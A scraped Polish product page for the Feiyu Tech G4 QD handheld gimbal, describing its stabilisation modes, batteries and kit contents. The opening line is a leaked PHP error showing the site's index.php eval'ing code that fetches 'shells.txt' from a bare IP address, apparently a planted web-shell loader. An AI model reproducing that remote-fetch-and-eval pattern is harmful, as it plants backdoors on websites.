Warning: file_get_contents(http://103.114.107.133/shells.txt): failed to open stream: Connection refused in /usr/home/sjcam/domains/sjcam-poland.com/public_html/index.php(2) : eval()'d code on line 2 Gimbal ręczny 3-osiowy Feiyu Tech G4 QD do kamer sportowych

Gimbal ręczny 3-osiowy Feiyu Tech G4 QD do kamer sportowych

G4-QD

Nowe

trzyosiowy gimbal

zaprojektowany dla kamer sportowych

trzy tryby stabilizacji

Więcej szczegółów

Dostępny

808,94 zł

Wysyłka w ciągu 24 godzin

Gwarancja 24 miesiące

Bezpieczne zakupy

Feiyu Tech G4 QD to kompaktowy, trzyosiowy gimbal ręczny zaprojektowany do współpracy z kamerami sportowymi typu SJCAM. Umożliwia tworzenie płynnych i pozbawionych drgań ujęć nawet w najbardziej ekstremalnych sytuacjach.

 

Uchwyt G4 QD pozwala na łatwy i szybki montaż dowolnego korpusu kamery o wysokości od 33 do 46 milimetrów. Jego konstrukcja zapewnia dostęp do przycisków oraz ekranu zamontowanej kamerki, co znacznie podnosi komfort pracy z urządzeniem.

 

Gimbal umożliwia zasilanie kamer wyposażonych w port mini USB z akumulatora stabilizatora, a także ładowanie ich bez konieczności wyjmowania z uchwytu gimbala oraz przekazywanie nagrywanego video do zewnętrznego monitora (jeżeli kamera posiada taką funkcję).

 

G4 QD oferuje trzy tryby pracy, w których kamera skierowana jest nieruchomo w jedną stronę lub płynnie podąża za ruchem operatora. Ustawienie kamery w pożądanej pozycji umożliwia praktyczny joystick. Stabilizator oferuje także użyteczne funkcje: pracy w odwróconej pozycji, wypoziomowania oraz uśpienia.

 

Przełączanie pomiędzy trybami pracy jest intuicyjne. Odbywa się za pomocą przycisku funkcyjnego umieszczonego na uchwycie gimbala. O wybranym trybie informuje LED-owy wskaźnik ukryty w przycisku.

 

Tryby pracy:

  • płynne podążanie za ruchem operatora na osi „pan” – osie „tilt” i „roll” zablokowane
  • płynne podążanie za ruchem operatora na osiach „tilt” i „pan” – oś „roll” zablokowana
  • wszystkie osie zablokowane – kamera utrzymuje stałe położenie i kierunek

 

Stabilizator zasilany jest dwoma akumulatorami IMR 18350 o pojemności 900 mAh. O poziomie naładowania akumulatorów informuje LED-owy wskaźnik umieszczony u podstawy silnika osi „pan”.

 

Wygodna, ergonomiczna rączka pozwala na sterowanie urządzeniem jedną ręką.

 

Funkcjonalność gimbala rozbudować można o opcjonalne akcesoria takie jak: dodatkowe zasilanie, ramię teleskopowe oraz radiowy pilot sterujący pracą urządzenia.

 

W zestawie poza samym urządzeniem znajdują się cztery akumulatory IMR 18350, ładowarka, kabel zasilający do kamerki, kabel video, kabel USB – mini USB oraz adapter USB.

stab

Zasilanie2 akumulatory IMR 18350
W zestawiegimbal G4 QD, 4 akumulatory IMR 18350 (2 komplety), ładowarka, kabel USB – mini USB, kabel video, kabel zasilający do kamery, adapter USB
Waga270 gram

Napisz opinię

Gimbal ręczny 3-osiowy Feiyu Tech G4 QD do kamer sportowych

Gimbal ręczny 3-osiowy Feiyu Tech G4 QD do kamer sportowych

trzyosiowy gimbal

zaprojektowany dla kamer sportowych

trzy tryby stabilizacji

Napisz opinię